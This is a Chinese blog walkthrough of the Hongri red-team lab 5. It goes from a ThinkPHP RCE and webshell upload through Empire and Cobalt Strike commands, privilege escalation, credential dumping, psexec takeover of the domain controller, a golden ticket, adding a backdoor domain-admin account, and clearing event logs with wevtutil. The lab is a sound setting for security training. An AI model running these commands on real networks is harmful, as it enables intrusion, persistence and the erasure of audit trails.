红日靶场5-wp

红日靶场5

🏬环境搭建

win7

  • 账密及域

    • leo@sun 123.com
    • sun\Administrator dc123.com
  • 双网卡模拟内外网

    • 外网网卡:192.168.130.150
    • 内网网卡:192.168.138.136

    外网网卡需要修改,我这里因为习惯了kali的IP,就修改到130的网段

image-20221106110310118

此时双网卡都没问题,kali和域内DC都可以ping通

image-20221106110809050

然后win7作为web服务器要开启PHPstudy

image-20221106111020862

win2008

  • 账密及修改的密码

    • sun\admin 2020.com 2022.com 2022.com
  • 内网IP

    • 192.168.138.138

拓扑图

image-20221106194418156

🌊信息收集

扫描130网段,发现存活主机

image-20221106171548686

这边利用goby能更好的查看他的资产和指纹描绘,扫完发现了一个rce

image-20221106112852867

直接利用工具上传冰蝎🐎

image-20221106114535582

🗺️外网打点

Thinkphp-rce

上传之后发现了有意思的,这里有一个add.php文件很大很可能是大马,再看底下有一个peiqi.php这个是个小马

image-20221106115156572

下载大马下来看一下,密码是个md5加密

image-20221106120731287

解开就是个简单的admins

image-20221106121033963

可以正常登陆上去

image-20221106121710141

会话迁移

接下来就可以转战内网了,由于是Windows服务器,这里就想尝试一下empire。上传马子上线之后可以执行相应模块的功能进行利用

usestager windows/launcher_bat
set Listener http
execute
agents
interact name
info

image-20221106184444795

按习惯的来就是上线cs,这里试了几个插件,最后使用cve-2015-1701成功提权

image-20221106124506712

🏳️‍🌈内网搜集

查看网络配置,有双网卡

shell ipconfig

image-20221106172214585

扫描内网138网段存活主机

usemoudule /powershell/situational_awareness/netiwork/arpscan
set Range 192.168.138.0-192.168.138.254
execute

image-20221106185917552

查看当前域和机器列表

image-20221106133735588

🚀横向移动

收集密码凭据

logonpasswd

image-20221106134401334

psexec拿域控

利用smb上线其他主机,配置好smb监听器之后就可已选择扩散会话,成功上线DC

rev2self
make_token SUN\Administrator
jump psexec DC smb

image-20221106134748767

🚩权限维持

黄金票据

在拿下域控的前提下,通过minikalize获得krbtgt用户的加密密码和当前域的sid

image-20221106164014445

生成黄金票据之后注入当前会话,之后就算域控更换密码了也能访问

image-20221106165425982

此时可以直接访问域控c盘

image-20221106165819845

添加域控账号

执行以下命令生成域用户

beacon> shell net user hack 123qwe!@# /add /domain
beacon> shell net user /domain
beacon> shell net group "Domain Admins" hack /add /domain

image-20221106171037373

在域控上也能看到成功创建了用户

image-20221106171151295

🌏痕迹清理

使用wevtutil进行清除

wevtutil cl security	//清理安全日志
wevtutil cl system		//清理系统日志
wevtutil cl application		//清理应用程序日志
wevtutil cl "windows powershell"	//清除power shell日志
wevtutil cl Setup	

image-20221106174326673

posted @ 2022-11-18 10:19  lockly  阅读(384)  评论(0编辑  收藏  举报